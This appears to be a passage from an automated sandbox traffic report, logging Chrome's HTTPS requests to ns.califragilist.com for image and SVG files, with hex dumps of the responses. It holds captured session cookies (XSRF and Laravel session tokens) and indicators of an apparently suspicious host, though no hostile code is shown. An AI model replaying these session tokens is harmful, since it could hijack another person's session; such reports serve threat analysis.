                                                                                                                                              2024-11-06 15:56:04 UTC1369INData Raw: 2e 35 20 32 31 2e 30 37 36 35 20 30 2e 35 20 32 31 2e 31 32 38 37 48 38 2e 35 5a 4d 32 30 2e 37 32 30 35 20 34 33 2e 30 39 35 38 43 31 30 2e 35 30 30 35 20 33 36 2e 37 34 34 33 20 38 2e 35 34 34 34 36 20 32 37 2e 34 33 30 32 20 38 2e 34 39 39 39 20 32 31 2e 31 30 30 36 4c 30 2e 35 30 30 30 39 39 20 32 31 2e 31 35 36 39 43 30 2e 35 35 35 39 35 39 20 32 39 2e 30 39 31 36 20 33 2e 31 31 38 38 37 20 34 31 2e 35 37 35 39 20 31 36 2e 34 39 37 37 20 34 39 2e 38 39 30 36 4c 32 30 2e 37 32 30 35 20 34 33 2e 30 39 35 38 5a 4d 32 37 2e 30 35 36 33 20 34 33 2e 30 38 36 39 43 32 35 2e 30 36 38 34 20 34 34 2e 33 31 30 36 20 32 32 2e 36 33 35 38 20 34 34 2e 32 39 33 33 20 32 30 2e 37 32 39 36 20 34 33 2e 31 30 31 35 4c 31 36 2e 34 38 38 36 20 34 39 2e 38 38 34 39 43 32
                                                                                                                                              Data Ascii: .5 21.0765 0.5 21.1287H8.5ZM20.7205 43.0958C10.5005 36.7443 8.54446 27.4302 8.4999 21.1006L0.500099 21.1569C0.555959 29.0916 3.11887 41.5759 16.4977 49.8906L20.7205 43.0958ZM27.0563 43.0869C25.0684 44.3106 22.6358 44.2933 20.7296 43.1015L16.4886 49.8849C2
                                                                                                                                              2024-11-06 15:56:04 UTC1369INData Raw: 32 35 20 34 38 2e 33 30 35 37 5a 4d 33 30 2e 32 36 30 37 20 34 38 2e 33 30 36 38 4c 33 30 2e 32 36 32 38 20 34 38 2e 33 30 35 35 4c 32 36 2e 30 38 36 31 20 34 31 2e 34 38 32 34 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 33 30 2e 32 36 30 37 20 34 38 2e 33 30 36 38 5a 4d 33 30 2e 32 36 36 20 34 38 2e 33 30 33 35 4c 33 30 2e 32 36 38 31 20 34 38 2e 33 30 32 33 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 33 30 2e 32 36 36 20 34 38 2e 33 30 33 35 5a 4d 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 43 32 31 2e 33 38 39 39 20 35 30 2e 37 33 37 39 20 32 36 2e 33 32 35 32 20 35 30 2e 37 32 39 34 20 33 30 2e 32 36 37 32 20 34 38 2e 33 30 32 38 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 43 32 34 2e 36 38
                                                                                                                                              Data Ascii: 25 48.3057ZM30.2607 48.3068L30.2628 48.3055L26.0861 41.4824L26.084 41.4836L30.2607 48.3068ZM30.266 48.3035L30.2681 48.3023L26.0767 41.4881L26.0746 41.4894L30.266 48.3035ZM17.4826 48.295C21.3899 50.7379 26.3252 50.7294 30.2672 48.3028L26.0734 41.4902C24.68
                                                                                                                                              2024-11-06 15:56:04 UTC245INData Raw: 36 39 32 20 31 39 2e 38 32 39 36 20 32 34 2e 30 38 39 31 20 31 39 2e 38 32 39 36 56 31 31 2e 38 32 39 36 5a 4d 33 34 2e 36 31 38 38 20 32 32 2e 33 35 39 33 43 33 34 2e 36 31 38 38 20 31 36 2e 35 34 33 39 20 32 39 2e 39 30 34 35 20 31 31 2e 38 32 39 36 20 32 34 2e 30 38 39 31 20 31 31 2e 38 32 39 36 56 31 39 2e 38 32 39 36 43 32 35 2e 34 38 36 32 20 31 39 2e 38 32 39 36 20 32 36 2e 36 31 38 38 20 32 30 2e 39 36 32 32 20 32 36 2e 36 31 38 38 20 32 32 2e 33 35 39 33 48 33 34 2e 36 31 38 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 30 30 30 30 22 20 6d 61 73 6b 3d 22 75 72 6c 28 23 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 29 22 2f 3e 0d 0a 3c 2f 73 76 67 3e 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 692 19.8296 24.0891 19.8296V11.8296ZM34.6188 22.3593C34.6188 16.5439 29.9045 11.8296 24.0891 11.8296V19.8296C25.4862 19.8296 26.6188 20.9622 26.6188 22.3593H34.6188Z" fill="#000000" mask="url(#07b26034-56a3-49d2-8f26-c7b84eb4eed4)"/></svg>
                                                                                                                                              2024-11-06 15:56:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              80192.168.2.1849859188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:03 UTC1145OUTGET /klsLwpUBDca0RxrYtZtR800jne0IqCzphswGY89y8d281n972UNwmgFEuHNXUPF6Bp4QvLcz5ab227 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:04 UTC1047INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:04 GMT
                                                                                                                                              Content-Type: image/webp
                                                                                                                                              Content-Length: 1298
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="klsLwpUBDca0RxrYtZtR800jne0IqCzphswGY89y8d281n972UNwmgFEuHNXUPF6Bp4QvLcz5ab227"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J3Rrn2q6jT86GXOx89RcT98zi3eF5em5E%2BFa%2FZSGaK9YI9oH3y1AmQOUNJmbX9324UHho8fr4ieCCoAJRNzcidIh3Y7rHREgw0GS6oPe2vuBHtfImmvRxbqoXcwfng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3421&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2067&delivery_rate=819468&cwnd=251&unsent_bytes=0&cid=4671dc51914437e6&ts=142&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6457cca9b1440-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1299&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1723&delivery_rate=2182366&cwnd=244&unsent_bytes=0&cid=c6e8b2fa9f94ed13&ts=552&x=0"
                                                                                                                                              2024-11-06 15:56:04 UTC322INData Raw: 52 49 46 46 0a 05 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 6b 00 00 17 00 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                                                                                              Data Ascii: RIFFWEBPVP8X0kICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                                                                                              2024-11-06 15:56:04 UTC976INData Raw: 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 58 02 00 00 0d a0 5c 6d 7b dc b6 7a b3 f4 ca ff 89 b7 19 d0 01 ff 54 20 b8 02 51 15 90 aa 80 52 05 8c 2a 90 58 81 c9 0a 0c 55 60 a8 82 40 1d e0 0e db f8 fc 59 79 79 07 8a 3c 71 e6 ec 22 62 02 fe 61 fa f1 e6 e3 4b a6 5f f0 bb d1 a9 04 fb
                                                                                                                                              Data Ascii: o8XYZ bXYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPHX\m{zT QR*XU`@Yyy<q"baK_


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              81192.168.2.1849860188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:03 UTC1372OUTGET /yzCIRquaPFUjERvoqJYr7I3cogJBrGklDFyrsAZD9QeqnvfO79zHfIab179 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:04 UTC1063INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:04 GMT
                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="yzCIRquaPFUjERvoqJYr7I3cogJBrGklDFyrsAZD9QeqnvfO79zHfIab179"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hgncp9fo8DqNNqSvnaO4C156u54N6SQ54b5bfjyZX%2B5zLYYIVqFv6tMbKIelIxtsIsGO%2BIO1aUvSFDLi%2FRnn6wI0jHDVi8hBDKVGABgXjAgeS4xe7u%2FtzHLoaBoo8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3268&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2292&delivery_rate=881314&cwnd=251&unsent_bytes=0&cid=d391500b99eb7e83&ts=91&x=0"
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6457cef6d6c01-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1166&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1950&delivery_rate=2149962&cwnd=239&unsent_bytes=0&cid=03a65807b143d9ef&ts=487&x=0"
                                                                                                                                              2024-11-06 15:56:04 UTC306INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                                                                                                              Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                                                                                                              2024-11-06 15:56:04 UTC1369INData Raw: 2e 39 35 31 2c 30 2c 30 2c 31 2c 33 37 2c 33 34 2e 37 33 36 61 33 2e 31 33 33 2c 33 2e 31 33 33 2c 30 2c 30 2c 31 2c 2e 32 31 38 2c 31 2e 31 35 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2d 2e 32 36 31 2c 31 2e 33 32 34 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2d 2e 37 34 39 2c 31 2e 31 33 32 71 2d 2e 38 38 38 2e 38 38 38 2d 31 2e 36 2c 31 2e 35 36 38 61 38 2e 37 35 33 2c 38 2e 37 35 33 2c 30 2c 30 2c 31 2d 31 2e 34 38 39 2c 31 2e 31 35 2c 36 2e 31 37 2c 36 2e 31 37 2c 30 2c 30 2c 31 2d 31 2e 37 31 36 2e 37 30 35 41 39 2e 33 36 37 2c 39 2e 33 36 37 2c 30 2c 30 2c 31 2c 32 39 2e 31 35 31 2c 34 32 61 31 33 2e 37 33 2c 31 33 2e 37 33 2c 30 2c 30 2c 31 2d 33 2e 39 2d 2e 35 39 32 41 32 31 2e 38 39 31 2c 32 31 2e 38 39 31 2c 30 2c 30 2c
                                                                                                                                              Data Ascii: .951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,
                                                                                                                                              2024-11-06 15:56:04 UTC1237INData Raw: 2d 31 2e 32 37 32 61 31 2e 31 38 39 2c 31 2e 31 38 39 2c 30 2c 30 2c 30 2c 2e 33 36 36 2d 2e 38 37 31 2c 31 2e 33 38 32 2c 31 2e 33 38 32 2c 30 2c 30 2c 30 2d 2e 32 37 39 2d 2e 36 35 33 41 31 30 2e 34 2c 31 30 2e 34 2c 30 2c 30 2c 30 2c 33 34 2c 33 34 2e 33 30 39 61 31 34 2e 30 36 2c 31 34 2e 30 36 2c 30 2c 30 2c 30 2d 2e 39 35 38 2d 31 2e 30 33 36 71 2d 2e 35 33 31 2d 2e 35 32 33 2d 31 2e 30 33 36 2d 2e 39 35 38 61 38 2e 39 35 2c 38 2e 39 35 2c 30 2c 30 2c 30 2d 2e 39 33 32 2d 2e 37 31 34 2c 31 2e 33 38 32 2c 31 2e 33 38 32 2c 30 2c 30 2c 30 2d 2e 36 35 33 2d 2e 32 37 39 2c 31 2e 32 31 34 2c 31 2e 32 31 34 2c 30 2c 30 2c 30 2d 2e 37 2e 32 32 36 2c 34 2e 31 2c 34 2e 31 2c 30 2c 30 2c 30 2d 2e 36 35 33 2e 35 36 36 71 2d 2e 33 32 32 2e 33 34 2d 2e 36 37 39
                                                                                                                                              Data Ascii: -1.272a1.189,1.189,0,0,0,.366-.871,1.382,1.382,0,0,0-.279-.653A10.4,10.4,0,0,0,34,34.309a14.06,14.06,0,0,0-.958-1.036q-.531-.523-1.036-.958a8.95,8.95,0,0,0-.932-.714,1.382,1.382,0,0,0-.653-.279,1.214,1.214,0,0,0-.7.226,4.1,4.1,0,0,0-.653.566q-.322.34-.679
                                                                                                                                              2024-11-06 15:56:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              82192.168.2.1849869188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:04 UTC1119OUTGET /wxsGdcms1rtQz5l1cTKsINVaEcbHopXA7Zunk6vNV19QQVZ12130 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:05 UTC1025INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:05 GMT
                                                                                                                                              Content-Type: image/webp
                                                                                                                                              Content-Length: 644
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="wxsGdcms1rtQz5l1cTKsINVaEcbHopXA7Zunk6vNV19QQVZ12130"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iuFEHCDo18jhBl78jKA9d7YWoEHQBQUrARZxnF05iW7ul8orC23%2FEihLVbtRd%2BZjqA0qi4OdILiA5FbeuwKe7StXc2p%2BuZL%2FD%2BMk9XXh3kD8tR05QQN8gi08tDEvIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3300&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2039&delivery_rate=845053&cwnd=245&unsent_bytes=0&cid=904d45e70bdee77f&ts=120&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de64582ea167b2a-DEN
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=18980&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1697&delivery_rate=152140&cwnd=32&unsent_bytes=0&cid=c0f7da5c1d3b70ea&ts=545&x=0"
                                                                                                                                              2024-11-06 15:56:05 UTC344INData Raw: 52 49 46 46 7c 02 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 17 00 00 17 00 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                                                                                              Data Ascii: RIFF|WEBPVP8X0ICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                                                                                              2024-11-06 15:56:05 UTC300INData Raw: 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 4b 00 00 00 01 57 60 24 92 d4 f4 9f 7a f9 80 22 0d 59 88 88 50 7d 30 3b 07 50 45 b2 92 47 0b 12 68 00 c6 06 8c 39 88 40 0a 8d 60 03 93 32 ef 8b 00 11 fd 9f 00 f4 3d 99 54 e6 0a 91 0a f2 2d 33 b3 ea 6f 77 f7 2a 14 ec 11 26 94 c1 a0 da 05 00 56 50 38 20 3a 00 00 00 30 03 00 9d 01 2a 18 00 18 00 3e 6d 26
                                                                                                                                              Data Ascii: bXYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPHKW`$z"YP}0;PEGh9@`2=T-3ow*&VP8 :0*>m&


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              83192.168.2.1849870188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:04 UTC1374OUTGET /rsvqFqFKEhRzIVFcaSXFIFklJZjDuvi98kzxNrUiaZdwEP3buTKNzKLKef192 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
